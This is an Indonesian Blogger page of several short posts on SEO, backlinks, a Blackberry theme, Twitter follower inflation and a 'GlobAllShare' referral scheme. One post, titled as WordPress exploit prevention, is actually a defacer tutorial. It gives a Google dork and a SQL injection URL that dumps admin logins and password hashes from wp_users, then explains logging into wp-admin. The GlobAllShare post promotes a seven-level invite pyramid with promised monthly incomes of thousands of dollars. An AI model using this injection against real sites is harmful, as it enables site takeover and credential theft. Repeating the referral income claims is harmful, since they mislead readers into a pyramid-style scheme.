Latest Post

Theme Nabilah JKT48 For Blackberry

Written By RFunBook on Wednesday, June 4, 2014 | 8:54 AM

Siapa yang tidak kenal nabilah JKT48? Yups, member yang paling terkenal dan followersnya paling banyak ini adalah member yang paling muda di JKT48. Pada kesempatan kali ini saya akan ngeshare Theme Nabilah. Theme ini khusus untuk Blackberry saja. Bila sobat sudah mendownload theme ini dan berhasil menginstallnya saya harap sobat berkomentar di blog saya ini dengan tipe HP Blackberry nya masing - masing, supaya yang lain bisa mengetahui tipe BB apa saja support dengan theme ini.

Screenshot :



Link Download :
Support Untuk :
  • Blackberry 8520
  • Blackberry 9800
  • Blackberry 9220
  • Blackberry 9360
  • Blackberry 9300
  • Blackberry 9860
  • Blackberry 9830
  • Blackberry 9900
  • Blackberry 9220

AUTO FOLLOWER 2014 | Twitter Marketing

Written By RFunBook on Sunday, June 1, 2014 | 11:22 PM

Bagi Anda yang berbisnis Online untuk mempromosikan Produk atau Jasa Anda, bisa menggunakan Pemasaran Online.
Pemasaran online ini bukan hanya menjual produk saja, tapi terdiri dari berbagai aspek dalam memasarkan sebuah bisnis, diantaranya promosi, branding, menjual produk atau layanan, dan lain-lain. Tujuan internet marketing ini tidak lain adalah untuk meningkatkan brand awareness dan profit.
Berbagai perusahaan telah berhasil memasarkan bisnis mereka melalui internet, baik itu bisnis skala kecil maupun bisnis skala besar. Hal ini karena masyarkat Indonesia sudah semakin banyak menggunakan internet, apalagi sebagian besar masyarakat Indonesia sudah memiliki smartphone dan bisa membuka berbagai situs melalui ponsel mereka.

Kali ini akan berbagi bagaimana menggunakan Twitter untuk Marketing Anda.
Syaratnya :
1) Anda harus punya akun Twitter dulu ya...
2) Usahakan Anda promosikan link Twiiter Anda untuk mendapatkan Follower yang banyak.
3) Anda bisa celoteh tiap waktu di Twitter Anda jika Follower nya sudah banyak dan jangan lupa untuk menyisipkan Website atau Blog Marketing Anda.

Banyak cara untuk mendapatkan Follower Twitter dengan Mudah dan Gratis koq..
Ini saya dapatkan langsung dari TL Twitter..
Sangat mudah menggunakan Auto Follower ini.. Anda cukup masukkan saja Username Twitter Anda.
yukk kita test saja.. 
1) Pertama Anda buka -->  http://followtap.net
2) Anda ketikkan saja USERNAME Twitter nya..
3) Biarkan saja sampai habis..

Ini bisa Anda gunakan kapan saja dan akun Twitter mana saja.
Alih-alih bisa Anda pake Trik ini untuk membuka Jasa Perbanyak Follower Twitter.. :D

Met mencoba ya gan....

Bertani Saham dari GloballShare

Written By RFunBook on Tuesday, December 17, 2013 | 7:28 PM

Kali ini kita bisa Bertani Saham dengan Gratis.. ( pendaftaran gratis sampai akhir thn 2013 ini loh gan.. )
Apa itu GlobalShare?
GS merupakan jejaring Sosial kayak FB dan mempunyai kelebihan tersendiri, spt :
GlobAllShare berbagi keuntungan global dengan para penggunanya, yang telah memberi kontribusi pada pertumbuhan global dan menyebarkan selama periode pra-organisasi. 

 Tujuan GlobAllShare bukan hanya untuk memungkinkan penggunaan gratis bagi pengguna, tapi untuk membuat mereka merasa komunitas global mereka sendiri dan dengan demikian mereka akan membentuk sebagai mereka merasa tepat. Itulah sebabnya GlobAllShare memastikan Status kepemilikan untuk setiap pengguna dalam bentuk saham gratis selama tahap pra-organisasi.
Setiap anggota GlobAllShare, yang bergabung dengan masyarakat selama tahap pra-organisasi dan memberikan kontribusi terhadap pertumbuhan global daripadanya, mungkin mendapatkan saham GlobAllShare terus semua cuma-cuma dan setiap bulan akan menerima dividen dari laba global dalam proporsi saham yang dimiliki setelah usaha ini diluncurkan. 


Agan juga bisa mendapatkan saham Agan dalam komunitas GlobAllShare hanya selama tahap pra-organisasi. Yang perlu Agan lakukan adalah untuk mengundang teman-teman dan kenalan ke website GlobAllShare itu.
Jika Anda telah mengundang 5 teman-teman Agan berhasil, akan mendapatkan 1 GlobAllShare saham langsung. Tetapi Agan tidak mungkin hanya mendapatkan saham setelah mengundang kenalan Anda sendiri, tapi setelah setiap pengguna lanjut diundang oleh teman-teman Agan juga, apalagi setelah kenalan teman 'juga, karena melalui 7 tingkat berikutnya setelah masing-masing teman Agan, yang menyadari 5 undangan sukses Agan juga akan mendapatkan 1 share lebih GlobAllShare. 



Perhitungan Pendapatan Saham nya :

Jika Anda telah mengundang 5 teman-teman Anda ke komunitas GlobAllShare berhasil dan teman diundang juga mengajak 5 teman-teman mereka dalam 7 tingkat berikutnya setelah Anda, maka Anda mungkin akan berhak atas dividen berikut dalam setiap bulan. level 1 5 mengundang 1 GAS saham level 2 25 mengundang 5 GAS share level 3 125 mengundang 25 saham GAS level 4 625 mengundang 125 saham GAS level 5 3 125 mengundang 625 saham GAS level 6 15 625 mengundang 3 saham 125 GAS level 7 78 125 mengundang 15 625 saham GAS Jumlah saham 19,531 GAS
Sesuai dengan contoh, Anda mungkin mendapatkan sama sekali 19.531 GlobAllShare saham beralasan, setelah itu Anda akan membayar dividen bulanan setelah peluncuran global usaha. Jika, misalnya, Anda dibayar hanya $ 0,25 dividen dari laba global bulan, Anda akan mendapatkan $ 5.000 per bulan. Anda bahkan mungkin mendapatkan dividen bulanan $ 0,5 atau $ 1,0 setelah setiap saham Anda, dengan demikian penghasilan bulanan sebesar $ 10.000 atau $ 20.000 dapat dengan mudah dihasilkan.
Anda dapat memonitor jumlah dan nilai saham Anda serta jumlah dividen bulanan Anda di WebOffice secara permanen. 


Sebagai anggota dari komunitas GlobAllShare Anda mungkin tidak hanya mendapatkan penghasilan bulanan dalam bentuk dividen, tetapi sejumlah besar uang juga karena Anda dapat menjual saham Anda segera. 

Penasaran?
DAFTAR GRATIS saja dulu DISINI

SeoParking | Bertani Duit dari Tanpa Blog |

Abis semalam jalan-jalan berselancar di mbah guugling nemu postingan ini..tentang cara bertani duit tanpa ngeblog.. koq bisa ya?
kita kupas ya informasinya step by step..
SEOParking adalah layanan berjenis domain parking. Bedanya, alih-alih mengisi situs / domain dengan iklan belaka, SEOParking menggarap situs / domain kita seperti layaknya sebuah blog WordPress.
Adapun kelebihan lain dari SEOParking adalah:
  • Kita dapat menambahkan kode iklan di bagian atas (header), bawah (footer), dan samping (sidebar). Kode iklan bisa berupa HTML biasa atau kode JavaScript. Beberapa layanan monetisasi yang sudah saya coba kombinasikan dengan SEOParking adalah Google AdSense, InfoLinks, dan Amazon.
  • Kita dapat menambahkan artikel kita sendiri jika diinginkan atau menghapus artikel lain yang dipublikasikan secara otomatis oleh SEOParking (biasanya mereka mengambilnya dari situs-situs direktori artikel).
  • Secara otomatis, situs kita juga akan ter-optimasi di mesin pencari karena diberi backlink dari situs-situs lain yang ada di jaringan SEOParking.
Bertani Duit dari Seoparking

Seperti sudah disebutkan sebelumnya, karena pada dasarnya saya memanfaatkan layanan ini sebagai ladang backlink, dari sisi penghasilan saya masih belum terlalu mengoptimalkannya. Tapi sebagai gambaran, berikut ini perolehan Google Adsense untuk sebagian situs saya yang ada di SEOParking:
 


Adapun Syarat Umum SEOParking, sbb :

Karena ini layanan sejenis domain parking, sudah pasti syarat utamanya adalah Agan harus memiliki sebuah domain. Di sini tidak ada persyaratan khusus untuk domain yang diperbolehkan selain harus memiliki ekstensi 1 level. Artinya, domain dengan ekstensi .CO.ID, .CO.CC, dan sebagainya tidak diperkenankan untuk didaftarkan.

Tips / Trik SEOParking
Berikut ini beberapa tips dan trik seputar SEOParking:
  • Untuk hasil yang lebih maksimal, ikuti aturan dasar SEO yang berhubungan dengan nama domain. Seperti misalnya keberadaan kata kunci di dalam nama domain yang bersangkutan serta kesesuaian nama domain dengan judul situs. Jika memungkinkan, gunakan domain yang sudah berumur agar tingkat otoritasnya lebih tinggi.
  • Pada saat melakukan pengaturan domain, masukkan kata / frase kunci (yang berhubungan) sebanyak-banyaknya agar proses auto update domain yang bersangkutan lebih lancar. Kata kunci berbahasa Indonesia boleh ditambahkan tapi biasanya tidak terlalu berpengaruh.
  • Apabila domain yang Anda parkir ditujukan untuk keperluan monetisasi, sebaiknya matikan opsi posting Twitter dan YouTube karena akan membuat situs Anda tampak tidak menarik.
Met Bertani Dollar ya a...smoga sukses..jgn lupa bersedekah saja... :)

Pencegahan Exploit WP - Blogs

Written By RFunBook on Monday, December 16, 2013 | 3:26 AM

Kali ini aq akan share mengenai pengamanan blog WP yang mana suka diacak-acak defacer..
berikut ini tutorial cara Defacer menggunakan Exploit ini..

Pertama masukkan Dork nya dulu di mbah google
Dork: inurl:"fbconnect_action=myhome"

[Image: untitled24.JPG]

Klik situs Targetnya

[Image: untitled22.JPG]

Sekarang ubah URL :
?fbconnect_action=myhome&userid=

Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Sekarang keluar Username dan Password Admin.

Encrypt Password MD5 (Blowfish) dengan software yang ada di sini


Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php

Tips Cek Ranking Postingan Blog

Written By RFunBook on Sunday, December 1, 2013 | 6:23 AM

SEO Serp adalah tool untuk mengetahui posisi rank artikel/postingan pada search engine.

Saya pernah membaca beberapa artikel tentang SEO SERP dan Googling ke beberapa Blog, ternyata SEO Serp memang penting untuk sebuah Blog, Katanya dengan kita menjalankan Rumusan SEO Serp blog kita mampu menyingkirkan blog-blog pesaing kita.. ( wahh kereennn... :v )

Berikut cara mengetahui posisi artikel di SEOSerp :

  1. Masuk ke situs SEOSerp.
  2. Pada target Google ada pilihan Google dari 60 negara, kita pilih www.google.com atau www.google.co.id.
    Tutorial Blog,Seo
  3. Pada keywords diisikan kata kunci yang Sobat cari.
  4. Kemudian your domain isikan alamat blog Sobat
  5. Klik tombol Go for SERP.
nah agan bisa liat hasil nya..apakah kw blog agan masuk dalam daftar?

met mencoba gan...

EBOOK BACKLINK

Written By RFunBook on Friday, November 29, 2013 | 7:23 PM


Sudah pada tau kan apa itu BACKLINK?
klo menurut aq nih..  
Backlink adalah singkatan dari backup link yaitu link yang menuju blog agan supaya blog dan website agan bisa menjadi Pejwan di halaman 1 Google utk pencarian suatu kata kunci.

Nah kali ini aq mau bagi info buat Ebook Backlink ini yang dishare oleh salah satu pentolan Salam Pejwan.
apa saja isi Ebook nya ya?
 
PAKET 1 :
  • Cara mendapatkan backlink dofollow dari Opera
  • Cara mendapatkan backlink dari Zoom Group
 PAKET 2:
  • Cara submit feed di Feedage
  • Cara mendapatkan backlink dari situs AboutMe
  • Cara backlink komentar di blog Bravejournal
  • Teknik dasar riset keyword dengan Google Keyword Planner, Google Suggestion, Ubber Suggestion
 PAKET 3 :
  • Cara mendapatkan backlink situs image hosting Flickr
  • Cara mendapatkan backlink dari Social Media Plurk
 PAKET 4 :
  • Cara mendapatkan backlink di situs personal image 500PX
  • Footprint comment di Weebly
 PAKET 5 :
  • Cara unik mendapatkan backlink di blog Tumblr
  • Footprint comment di Webs.com
 PAKET 6 :
  • Cara mendapatkan backlink GPlus
  • Footprint sidebar comment Wordpress
Untuk Info lebih lanjutnya...silahkan agan baca saja disini.
Mau berkenalan dengan Owner Ebook nya... ADD FRIEND

CARA MENDAPATKAN 100 Visitor Gratis ke Blog

Written By RFunBook on Thursday, May 9, 2013 | 11:49 AM

Sdh ngga sabar ya untuk mencoba cara ini ya gan?..
Sangat bagus nih dipake untuk Blog yg main Adsense atau blog baru biar cepat Terindeks oleh Mbah google..

Cara nya simple kq gan..
agan buka saja Disini
terus agan masukin Link URL Blog agan, klo aq masukkan link url postingan gan,, biar mbah google indeks postingan aq jga.. :D
udah gitu agan buka Email agan untuk verifikasi nya..
selain itu..agan juga dikasih control panel nya dan bisa untuk menganalisa visitor yang masuk ke blog agan.

selamat mencoba ya gan..


GRATIS Mendapatkan 100 visitor ke Blog

Nah kali ini ada kabar gembira buat Bloggers khususnya Bloggers Indonesia.
ini ada Tips Cara mendapatkan Visitor secara Gratis ke blog agan.
100 visitor free nih.
agan bsa tambahkan Trik nya dengan cara siapkan email byk2 deh utk bisa submit URL blog agan dengan memakai cara ini.
bgmna caranya?
langung aja gan... kita ke TKP...
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Ayooo Belajar - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger